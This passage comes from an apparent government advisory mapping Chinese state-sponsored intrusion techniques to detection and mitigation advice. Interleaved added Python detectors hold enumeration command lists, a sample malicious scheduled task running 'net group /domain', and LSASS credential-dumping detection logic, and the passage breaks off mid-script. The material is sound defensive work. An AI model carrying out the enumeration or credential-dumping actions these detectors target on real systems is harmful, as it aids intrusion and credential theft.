* JavaScript [[T1059.007](<https://attack.mitre.org/versions/v9/techniques/T1059/007>)]
* Network Device CLI [[T1059.008](<https://attack.mitre.org/versions/v9/techniques/T1059/008>)]
**Threat Actor Procedure(s):** Chinese state-sponsored cyber actors have been observed:
* Using cmd.exe, the JavaScript/JScript interpreter, and network device command line interpreters (CLI).
* Using PowerShell to conduct reconnaissance, enumeration, and discovery of the victim network.
* Employing Python scripts to exploit vulnerable servers.
* Using a UNIX shell in order to conduct discovery, enumeration, and lateral movement on Linux® servers in the victim network.
**Detection and Mitigation Recommendations:**
PowerShell:
* Turn on PowerShell logging. (**Note:** this works better in newer versions of PowerShell. NSA, CISA, and FBI recommend using version 5 or higher.)
* Push PowerShell logs into a security information and event management (SIEM) tool.
* Monitor for suspicious behavior and commands. Regularly evaluate and update blocklists and allowlists.
* Use an antivirus program, which may stop malicious code execution that cyber actors attempt to execute via PowerShell.
* Remove PowerShell if it is not necessary for operations.
* Restrict which commands can be used.
Windows Command Shell:
* Restrict use to administrator, developer, or power user systems. Consider its use suspicious and investigate, especially if average users run scripts.
* Investigate scripts running out of cycle from patching or other administrator functions if scripts are not commonly used on a system, but enabled.
* Monitor for and investigate other unusual or suspicious scripting behavior.
Unix Shell:
* Use application controls to prevent execution.
* Monitor for and investigate unusual scripting behavior. Use of the Unix shell may be common on administrator, developer, or power user systems. In this scenario, normal users running scripts should be considered suspicious.
* If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions should be considered suspicious.
Python:
* Audit inventory systems for unauthorized Python installations.
* Blocklist Python where not required.
* Prevent users from installing Python where not required.
JavaScript:
* Turn off or restrict access to unneeded scripting components.
* Blocklist scripting where appropriate.
* For malicious code served up through ads, adblockers can help prevent that code from executing.
Network Device Command Line Interface (CLI):
* Use TACACS+ to keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization.
* Use an authentication, authorization, and accounting (AAA) system to limit actions administrators can perform and provide a history of user actions to detect unauthorized use and abuse.
* Ensure least privilege principles are applied to user accounts and groups.
**Defensive Tactics and Techniques:**
Harden:
* Platform Hardening [[D3-PH](<https://d3fend.mitre.org/technique/d3f:PlatformHardening>)]
Detect:
* Process Analysis
  * Script Execution Analysis [[D3-SEA](<https://d3fend.mitre.org/technique/d3f:ScriptExecutionAnalysis>)]
Isolate:
* Execution Isolation
  * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]

**Threat Actor Technique / Sub-Techniques:** Scheduled Task/Job [[T1053](<https://attack.mitre.org/versions/v9/techniques/T1053>)]:
* Cron [[T1053.003](<https://attack.mitre.org/versions/v9/techniques/T1053/003>)]
* Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v9/techniques/T1053/005>)]
**Threat Actor Procedure(s):** Chinese state-sponsored cyber actors have been observed using Cobalt Strike, webshells, or command line interface tools, such as `schtasks` or `crontab`, to create and schedule tasks that enumerate victim devices and networks.
**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)] and Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].
**Detection and Mitigation Recommendations:**
* Monitor scheduled task creation from common utilities using command-line invocation and compare for any changes that do not correlate with known software, patch cycles, or other administrative activity.
* Configure event logging for scheduled task creation and monitor process execution from `svchost.exe` (Windows 10) and Windows Task Scheduler (older versions of Windows) to look for changes in `%systemroot%\System32\Tasks` that do not correlate with known software, patch cycles, or other administrative activity. Additionally, monitor for any scheduled tasks created via command line utilities, such as PowerShell or Windows Management Instrumentation (WMI), that do not conform to typical administrator or user actions.
**Defensive Tactics and Techniques:**
Detect:
* Platform Monitoring
  * Operating System Monitoring [[D3-OSM](<https://d3fend.mitre.org/technique/d3f:OperatingSystemMonitoring>)]
    * Scheduled Job Analysis [[D3-SJA](<https://d3fend.mitre.org/technique/d3f:ScheduledJobAnalysis>)]
    * System Daemon Monitoring [[D3-SDM](<https://d3fend.mitre.org/technique/d3f:SystemDaemonMonitoring>)]
    * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]
Isolate:
* Execution Isolation
  * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]

User Execution [[T1204](<https://attack.mitre.org/versions/v9/techniques/T1204>)]
* Malicious Link [[T1204.001](<https://attack.mitre.org/versions/v9/techniques/T1204/001>)]
* Malicious File [[T1204.002](<https://attack.mitre.org/versions/v9/techniques/T1204/002>)]
|
Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns that encourage engagement from the target audience. These emails may contain a malicious link or file that provides the cyber actor access to the victim’s device after the user clicks on the malicious link or opens the attachment.
|
* Use an antivirus program, which may stop malicious code execution that cyber actors convince users to attempt to execute.
* Prevent unauthorized execution by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.
* Use a domain reputation service to detect and block suspicious or malicious domains.
* Determine if certain categories of websites are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.
* Ensure all browsers and plugins are kept up to date.
* Use modern browsers with security features turned on.
* Use browser and application sandboxes or remote virtual environments to mitigate browser or other application exploitation.
|
Detect:
* File Analysis
* Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]
* File Content Rules [[D3-FCR](<https://d3fend.mitre.org/technique/d3f:FileContentRules>)]
* Identifier Analysis
* Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]
* URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]
* Network Traffic Analysis
* DNS Traffic Analysis [[D3-DNSTA](<https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis>)]
Isolate:
* Execution Isolation
* Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]
* Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]
* Network Isolation
* DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)]
* Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)]
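The scheduled-task recommendations above amount to comparing every task-creation event against a known-software baseline and a maintenance window. The following is an added example (not part of the advisory): it parses constructed Windows Security event 4698 records, whose TaskContent XML follows the real Task Scheduler schema, and flags tasks that fall outside the baseline or whose actions enumerate hosts and networks. The task-name prefixes, maintenance hours and event values are assumptions.

```python
"""Baseline correlation for Windows event 4698 (scheduled task created).

Added example, not from the advisory. Event records are constructed, but the
TaskContent XML follows the real Task Scheduler schema so that parsing works
on events exported from a SIEM.
"""
import xml.etree.ElementTree as ET
from datetime import datetime

TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Task-name prefixes that known software and the patch cycle legitimately create.
# Constructed baseline; build the real one from a clean reference host.
KNOWN_TASK_PREFIXES = ("\\Microsoft\\Windows\\", "\\Corp\\Patching\\")
# The advisory notes that these actors schedule tasks that enumerate devices and
# networks; legitimate software rarely does, so these substrings are high-signal.
ENUMERATION_MARKERS = ("net group", "net user", "net view", "ipconfig",
                       "nltest", "systeminfo", "tasklist", "whoami")
MAINTENANCE_HOURS = range(2, 5)  # 02:00-04:59: the only window admins use here (assumed)


def parse_task_actions(task_content):
    """Return [(command, arguments)] for every <Exec> action in the task XML."""
    root = ET.fromstring(task_content)
    actions = []
    for exec_el in root.iter(TASK_NS + "Exec"):
        command = exec_el.findtext(TASK_NS + "Command", default="").strip()
        arguments = exec_el.findtext(TASK_NS + "Arguments", default="").strip()
        actions.append((command, arguments))
    return actions


def assess_task(event):
    """Reasons a 4698 event does not fit the baseline; an empty list is benign."""
    reasons = []
    created = datetime.fromisoformat(event["time"])
    if not event["task"].startswith(KNOWN_TASK_PREFIXES):
        reasons.append("task name is outside the known-software baseline")
        if created.hour not in MAINTENANCE_HOURS:
            reasons.append("created outside the maintenance window")
    for command, arguments in parse_task_actions(event["content"]):
        line = f"{command} {arguments}".lower()
        hits = [m for m in ENUMERATION_MARKERS if m in line]
        if hits:
            reasons.append("task action enumerates hosts/network: " + ", ".join(hits))
    return reasons


def review(events):
    """Map task name -> reasons for every event that needs an analyst's look."""
    findings = {}
    for event in events:
        reasons = assess_task(event)
        if reasons:
            findings[event["task"]] = reasons
    return findings


def _task_xml(command, arguments):
    """Build a minimal TaskContent document (constructed test data)."""
    return (f'<Task version="1.2" xmlns="{TASK_NS[1:-1]}"><Actions><Exec>'
            f"<Command>{command}</Command><Arguments>{arguments}</Arguments>"
            "</Exec></Actions></Task>")


# Constructed 4698 records in the shape a SIEM presents them.
SAMPLE_EVENTS = [
    {"time": "2021-07-13T03:10:00", "host": "WS01", "subject": "SYSTEM",
     "task": "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start",
     "content": _task_xml("%systemroot%\\system32\\sc.exe", "start wuauserv")},
    {"time": "2021-07-13T03:00:00", "host": "SRV02", "subject": "CORP\\patchadmin",
     "task": "\\Corp\\Patching\\MonthlyBaseline",
     "content": _task_xml("C:\\Program Files\\Corp\\patch.exe", "--apply")},
    # Unknown task name, created mid-afternoon, running a group enumeration.
    {"time": "2021-07-13T14:22:05", "host": "WS07", "subject": "CORP\\jdoe",
     "task": "\\Updater",
     "content": _task_xml("C:\\Windows\\System32\\cmd.exe", "/c net group /domain")},
]

if __name__ == "__main__":
    for task, reasons in review(SAMPLE_EVENTS).items():
        print(task, "->", "; ".join(reasons))
```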
### Tactics: _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)]
_Table V: Chinese state-sponsored cyber actors’ Persistence TTPs with detection and mitigation recommendations_
Threat Actor Technique / Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques
---|---|---|---
Hijack Execution Flow [[T1574](<https://attack.mitre.org/versions/v9/techniques/T1574>)]:
* DLL Search Order Hijacking [[T1574.001](<https://attack.mitre.org/versions/v9/techniques/T1574/001>)]
|
Chinese state-sponsored cyber actors have been observed using benign executables that used Dynamic Link Library (DLL) load-order hijacking to activate the malware installation process.
**Note:** this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)] and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].
|
* Disallow loading of remote DLLs.
* Enable safe DLL search mode.
* Implement tools for detecting search order hijacking opportunities.
* Use application allowlisting to block unknown DLLs.
* Monitor the file system for created, moved, and renamed DLLs.
* Monitor for changes in system DLLs not associated with updates or patches.
* Monitor DLLs loaded by processes (e.g., legitimate name, but abnormal path).
|
Detect:
* Platform Monitoring
* Operating System Monitoring
* Service Binary Verification [[D3-SBV](<https://d3fend.mitre.org/technique/d3f:ServiceBinaryVerification>)]
* Process Analysis
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
Isolate:
* Execution Isolation
* Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]
Modify Authentication Process [[T1556](<https://attack.mitre.org/versions/v9/techniques/T1556>)]
* Domain Controller Authentication [[T1556.001](<https://attack.mitre.org/versions/v9/techniques/T1556/001>)]
|
Chinese state-sponsored cyber actors were observed creating a new sign-in policy to bypass MFA requirements to maintain access to the victim network.
**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)] and Credential Access [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)].
|
* Monitor for policy changes to authentication mechanisms used by the domain controller.
* Monitor for modifications to functions exported from authentication DLLs (such as `cryptdll.dll` and `samsrv.dll`).
* Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.
* Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts (for example, one account logged into multiple systems simultaneously, multiple accounts logged into the same machine simultaneously, accounts logged in at odd times or outside of business hours).
* Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
* Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for and correlate changes to Registry entries.
|
Detect:
* Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)]
* User Behavior Analysis
* Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)]
* User Geolocation Logon Pattern Analysis [[D3-UGLPA](<https://d3fend.mitre.org/technique/d3f:UserGeolocationLogonPatternAnalysis>)]
Server Software Component [[T1505](<https://attack.mitre.org/versions/v9/techniques/T1505>)]:
* Web Shell [[T1505.003](<https://attack.mitre.org/versions/v9/techniques/T1505/003>)]
|
Chinese state-sponsored cyber actors have been observed planting web shells on exploited servers and using them to provide the cyber actors with access to the victim networks.
|
* Use Intrusion Detection Systems (IDS) to monitor for and identify China Chopper traffic using IDS signatures.
* Monitor and search for predictable China Chopper shell syntax to identify infected files on hosts.
* Perform integrity checks on critical servers to identify and investigate unexpected changes.
* Have application developers sign their code using digital signatures to verify their identity.
* Identify and remediate web application vulnerabilities or configuration weaknesses. Employ regular updates to applications and host operating systems.
* Implement a least-privilege policy on web servers to reduce adversaries’ ability to escalate privileges or pivot laterally to other hosts and control creation and execution of files in particular directories.
* If not already present, consider deploying a DMZ between web-facing systems and the corporate network. Limiting the interaction and logging traffic between the two provides a method to identify possible malicious activity.
* Ensure secure configuration of web servers. All unnecessary services and ports should be disabled or blocked. Access to necessary services and ports should be restricted, where feasible. This can include allowlisting or blocking external access to administration panels and not using default login credentials.
* Use a reverse proxy or alternative service, such as mod_security, to restrict accessible URL paths to known legitimate ones.
* Establish, and backup offline, a “known good” version of the relevant server and a regular change management policy to enable monitoring for changes to servable content with a file integrity system.
* Employ user input validation to restrict exploitation of vulnerabilities.
* Conduct regular system and application vulnerability scans to establish areas of risk. While this method does not protect against zero-day exploits, it will highlight possible areas of concern.
* Deploy a web application firewall and conduct regular virus signature checks, application fuzzing, code reviews, and server network analysis.
|
Detect:
* Network Traffic Analysis
* Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]
* Per Host Download-Upload Ratio Analysis [[D3-PHDURA](<https://d3fend.mitre.org/technique/d3f:PerHostDownload-UploadRatioAnalysis>)]
* Process Analysis
* Process Spawn Analysis
* Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]
Isolate:
* Network Isolation
* Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]
Create or Modify System Process [[T1543](<https://attack.mitre.org/versions/v9/techniques/T1543>)]:
* Windows Service [[T1543.003](<https://attack.mitre.org/versions/v9/techniques/T1543/003>)]
|
Chinese state-sponsored cyber actors have been observed executing malware shellcode and batch files to establish new services to enable persistence.
**Note:** this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].
|
* Only allow authorized administrators to make service changes and modify service configurations.
* Monitor processes and command-line arguments for actions that could create or modify services, especially if such modifications are unusual in your environment.
* Monitor WMI and PowerShell for service modifications.
| Detect:
* Process Analysis
* Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
### Tactics: _Privilege Escalation_ [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)]
_Table VI: Chinese state-sponsored cyber actors’ Privilege Escalation TTPs with detection and mitigation recommendations_
Threat Actor Technique / Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques
---|---|---|---
Domain Policy Modification [[T1484](<https://attack.mitre.org/versions/v9/techniques/T1484>)]
* Group Policy Modification [[T1484.001](<https://attack.mitre.org/versions/v9/techniques/T1484/001>)]
|
Chinese state-sponsored cyber actors have also been observed modifying group policies for password exploitation.
**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].
|
* Identify and correct Group Policy Object (GPO) permissions abuse opportunities (e.g., GPO modification privileges) using auditing tools.
* Monitor directory service changes using Windows event logs to detect GPO modifications. Several events may be logged for such GPO modifications.
* Consider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.
|
Detect:
* Network Traffic Analysis
* Administrative Network Activity Analysis [[D3-ANAA](<https://d3fend.mitre.org/technique/d3f:AdministrativeNetworkActivityAnalysis>)]
* Platform Monitoring
* Operating System Monitoring
* System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]
Process Injection [[T1055](<https://attack.mitre.org/versions/v9/techniques/T1055>)]:
* Dynamic Link Library Injection [[T1055.001](<https://attack.mitre.org/versions/v9/techniques/T1055/001>)]
* Portable Executable Injection [[T1055.002](<https://attack.mitre.org/versions/v9/techniques/T1055/002>)]
|
Chinese state-sponsored cyber actors have been observed:
* Injecting into the `rundll32.exe` process to hide usage of Mimikatz, as well as injecting into a running legitimate `explorer.exe` process for lateral movement.
* Using shellcode that injects implants into newly created instances of the Service Host process (`svchost`).
**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].
|
* Use endpoint protection software to block process injection based on behavior of the injection process.
* Monitor DLL/Portable Executable (PE) file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.
* Monitor for suspicious sequences of Windows API calls such as `CreateRemoteThread`, `VirtualAllocEx`, or `WriteProcessMemory` and analyze processes for unexpected or atypical behavior such as opening network connections or reading files.
* To minimize the probable impact of a threat actor using Mimikatz, always limit administrative privileges to only users who actually need it; upgrade Windows to at least version 8.1 or 10; run Local Security Authority Subsystem Service (LSASS) in protected mode on Windows 8.1 and higher; harden the local security authority (LSA) to prevent code injection.
|
Isolate:
* Execution Isolation
* Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]
* Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)]
### Tactics: _Defense Evasion_ [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]
_Table VII: Chinese state-sponsored cyber actors’ Defense Evasion TTPs with detection and mitigation recommendations_
Threat Actor Technique / Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques
---|---|---|---
Deobfuscate/Decode Files or Information [[T1140](<https://attack.mitre.org/versions/v9/techniques/T1140>)]
|
Chinese state-sponsored cyber actors were observed using the 7-Zip utility to unzip imported tools and malware files onto the victim device.
|
* Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.
* Consider blocking, disabling, or monitoring use of 7-Zip.
|
Detect:
* Process Analysis
* Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
Isolate:
* Execution Isolation
* Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)]
Hide Artifacts [[T1564](<https://attack.mitre.org/versions/v9/techniques/T1564>)]
|
Chinese state-sponsored cyber actors were observed using benign executables that used DLL load-order hijacking to activate the malware installation process.
|
* Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts, such as executables using DLL load-order hijacking that can activate malware.
* Monitor event and authentication logs for records of hidden artifacts being used.
* Monitor the file system and shell commands for hidden attribute usage.
|
Detect:
* Process Analysis
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
Isolate:
* Execution Isolation
* Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]
Indicator Removal from Host [[T1070](<https://attack.mitre.org/versions/v9/techniques/T1070>)]
|
Chinese state-sponsored cyber actors have been observed deleting files using `rm` or `del` commands.
Several files targeted by the cyber actors were timestomped so that their timestamps differ from when the files were actually created or used.
|
* Make the environment variables associated with command history read only to ensure that the history is preserved.
* Recognize timestomping by monitoring the contents of important directories and the attributes of the files.
* Prevent users from deleting or writing to certain files to stop adversaries from maliciously altering their `~/.bash_history` or `ConsoleHost_history.txt` files.
* Monitor for command-line deletion functions to correlate with binaries or other files that an adversary may create and later remove. Monitor for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce.
* Monitor and record file access requests and file handles. An original file handle can be correlated to a compromise and inconsistencies between file timestamps and previous handles opened to them can be a detection rule.
|
Detect:
* Platform Monitoring
* Operating System Monitoring
* System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]
* Process Analysis
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
Isolate:
* Execution Isolation
* Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]
Obfuscated Files or Information [[T1027](<https://attack.mitre.org/versions/v9/techniques/T1027>)]
|
Chinese state-sponsored cyber actors were observed Base64 encoding files and command strings to evade security measures.
|
Consider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after being processed/interpreted.
|
Detect:
* Process Analysis
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
Signed Binary Proxy Execution [[T1218](<https://attack.mitre.org/versions/v9/techniques/T1218>)]
* `Mshta` [[T1218.005](<https://attack.mitre.org/versions/v9/techniques/T1218/005>)]
* `Rundll32` [[T1218.011](<https://attack.mitre.org/versions/v9/techniques/T1218/011>)]
|
Chinese state-sponsored cyber actors were observed using Microsoft signed binaries, such as `Rundll32`, as a proxy to execute malicious payloads.
|
Monitor processes for the execution of known proxy binaries (e.g., `rundll32.exe`) and look for anomalous activity that does not follow historically good arguments and loaded DLLs associated with the invocation of the binary.
|
Detect:
* Process Analysis
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
* Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
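Both the Hijack Execution Flow row in Table V and the Hide Artifacts row above describe the same procedure: a benign executable loading a planted DLL by search order. The following is an added example (not the advisory's or any vendor's code) of the "legitimate name, abnormal path" and side-loading checks over constructed records shaped like Sysmon event 7 (Image loaded); the baseline DLL names, directory lists and event values are assumptions.

```python
"""Flag DLL loads that fit search-order hijacking / side-loading.

Added example, not from the advisory. Input records mimic the fields of Sysmon
event 7 (Image loaded): Image, ImageLoaded, Signed. Values are constructed.
"""
import ntpath

SYSTEM_DLL_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")
# DLL names that belong under the Windows directory. Constructed subset; in
# practice enumerate them from a clean reference host.
SYSTEM_DLL_NAMES = {"version.dll", "dbghelp.dll", "cryptbase.dll", "wtsapi32.dll"}
# Locations an ordinary user can write to; a DLL here is an easy hijack target.
USER_WRITABLE_HINTS = ("c:\\users\\", "c:\\programdata\\", "\\temp\\", "c:\\inetpub\\")


def _is_user_writable(directory):
    probe = directory.rstrip("\\") + "\\"
    return any(hint in probe for hint in USER_WRITABLE_HINTS)


def check_image_load(event):
    """Reasons this load looks like hijacking; an empty list means nothing odd."""
    dll = event["ImageLoaded"].lower()
    process = event["Image"].lower()
    dll_name = ntpath.basename(dll)
    dll_dir = ntpath.dirname(dll)
    reasons = []
    # "Legitimate name, abnormal path": a Windows DLL served from somewhere else.
    if dll_name in SYSTEM_DLL_NAMES and not dll_dir.startswith(SYSTEM_DLL_DIRS):
        reasons.append(f"system DLL name {dll_name} loaded from {dll_dir}")
    # Side-loading: the DLL sits next to the executable in a user-writable
    # directory and carries no signature.
    if (dll_dir == ntpath.dirname(process) and _is_user_writable(dll_dir)
            and event.get("Signed", "false").lower() != "true"):
        reasons.append(f"unsigned DLL loaded from the process's own writable directory {dll_dir}")
    return reasons


def review(events):
    """Map loaded-DLL path -> reasons for every load worth investigating."""
    findings = {}
    for event in events:
        reasons = check_image_load(event)
        if reasons:
            findings[event["ImageLoaded"]] = reasons
    return findings


# Constructed events.
SAMPLE_EVENTS = [
    # Normal: an installed application loads version.dll from System32.
    {"Image": r"C:\Program Files\Vendor\app.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": "true"},
    # Normal: the same application loads its own signed helper library.
    {"Image": r"C:\Program Files\Vendor\app.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\helper.dll", "Signed": "true"},
    # Hijack pattern: a benign executable copied into a temp folder loads an
    # unsigned version.dll from that same folder instead of System32.
    {"Image": r"C:\Users\jdoe\AppData\Local\Temp\vendor.exe",
     "ImageLoaded": r"C:\Users\jdoe\AppData\Local\Temp\version.dll", "Signed": "false"},
]

if __name__ == "__main__":
    for path, reasons in review(SAMPLE_EVENTS).items():
        print(path, "->", "; ".join(reasons))
```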
### Tactics: _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)]
_Table VIII: Chinese state-sponsored cyber actors’ Credential Access TTPs with detection and mitigation recommendations_
Threat Actor Technique / Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques
---|---|---|---
Exploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v9/techniques/T1212>)]
|
Chinese state-sponsored cyber actors have been observed exploiting Pulse Secure VPN appliances to view and extract valid user credentials and network information from the servers.
|
* Update and patch software regularly.
* Use cyber threat intelligence and open-source reporting to determine vulnerabilities that threat actors may be actively targeting and exploiting; patch those vulnerabilities immediately.
|
Harden:
* Platform Hardening
* Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]
* Credential Hardening
* Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]
OS Credential Dumping [[T1003](<https://attack.mitre.org/versions/v9/techniques/T1003>)]
* LSASS Memory [[T1003.001](<https://attack.mitre.org/versions/v9/techniques/T1003/001>)]
* NTDS [[T1003.003](<https://attack.mitre.org/versions/v9/techniques/T1003/003>)]
|
Chinese state-sponsored cyber actors were observed targeting the LSASS process or the Active Directory database (`NTDS.dit`) for credential dumping.
|
* Monitor process and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy `NTDS.dit`.
* Ensure that local administrator accounts have complex, unique passwords across all systems on the network.
* Limit credential overlap across accounts and systems by training users and administrators not to use the same passwords for multiple accounts.
* Consider disabling or restricting NTLM.
* Consider disabling `WDigest` authentication.
* Ensure that domain controllers are backed up and properly secured (e.g., encrypt backups).
* Implement Credential Guard to protect the LSA secrets from credential dumping on Windows 10. This is not configured by default and has hardware and firmware requirements.
* Enable Protected Process Light for LSA on Windows 8.1 and Windows Server 2012 R2.
|
Harden:
* Credential Hardening [[D3-CH](<https://d3fend.mitre.org/technique/d3f:CredentialHardening>)]
Detect:
* Process Analysis
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
* System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]
Isolate:
* Execution Isolation
* Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]
* Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)]
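The System Call Analysis and Process Analysis techniques listed for LSASS credential dumping come down to watching who opens a handle to `lsass.exe` and with what rights. The following is an added example (not from the advisory) that triages constructed records shaped like Sysmon event 10 (ProcessAccess): it ignores query-only handles, allowlists known readers, and flags handles with read/write/thread rights, especially when the call trace passes through unbacked memory as in the `rundll32.exe` injection procedure above. The allowlist and sample values are assumptions.

```python
"""Triage Sysmon event 10 (ProcessAccess) handles opened on lsass.exe.

Added example, not from the advisory. Records and the allowlist are
constructed; GrantedAccess uses the Windows process access-right bits.
"""
import ntpath

PROCESS_VM_READ = 0x0010        # needed to read credential material out of LSASS
PROCESS_VM_WRITE = 0x0020
PROCESS_CREATE_THREAD = 0x0002  # used when injecting into LSASS instead of reading
DUMP_CAPABLE = PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD

# Processes that touch LSASS memory as part of normal operation on the reference
# host (constructed; derive yours from a baseline and keep it short).
ALLOWED_SOURCES = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}
USER_WRITABLE_HINTS = ("c:\\users\\", "c:\\programdata\\", "\\temp\\")


def triage_process_access(event):
    """Return reasons to investigate, or None when the event is not of interest."""
    if ntpath.basename(event["TargetImage"].lower()) != "lsass.exe":
        return None
    granted = int(event["GrantedAccess"], 16)
    if not granted & DUMP_CAPABLE:
        return None  # query-only handles (e.g. 0x1400 from Task Manager) are noise
    source = event["SourceImage"].lower()
    if source in ALLOWED_SOURCES:
        return None
    reasons = [f"{ntpath.basename(source)} opened lsass.exe with access 0x{granted:x}"]
    if "unknown" in event.get("CallTrace", "").lower():
        # Sysmon prints UNKNOWN for frames in memory not backed by a file on
        # disk: the signature of injected code running inside the source process.
        reasons.append("call trace passes through unbacked memory (injected code)")
    if any(hint in source for hint in USER_WRITABLE_HINTS):
        reasons.append("source image lives in a user-writable directory")
    return reasons


def review(events):
    """Map source image -> reasons for every event that needs a look."""
    findings = {}
    for event in events:
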